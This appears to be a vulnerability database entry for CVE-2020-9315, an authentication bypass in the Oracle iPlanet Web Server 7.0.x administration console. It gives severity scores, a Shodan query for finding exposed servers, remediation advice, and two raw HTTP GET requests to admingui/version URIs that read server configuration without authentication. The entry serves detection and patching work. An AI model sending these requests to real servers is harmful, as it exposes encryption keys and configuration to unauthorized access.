| Title | Oracle iPlanet Web Server 7.0.x - Authentication Bypass |
|---|---|
| Author | dhiyaneshDk |
| Severity | High |
| Impact | Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected system. |
| Remediation | Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.8793 |
| CVE ID | CVE-2020-9315 |
| CWE ID | CWE-306 |
| Shodan Query | cpe:"cpe:2.3:a:oracle:iplanet_web_server" |
| Tags | cve cve2020 oracle auth-bypass iplanet vuln |
Oracle iPlanet Web Server 7.0.x has incorrect access control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. NOTE a related support policy can be found in the www.oracle.com references attached to this CVE.
GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-9315.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-9315.pcap
N/AN/A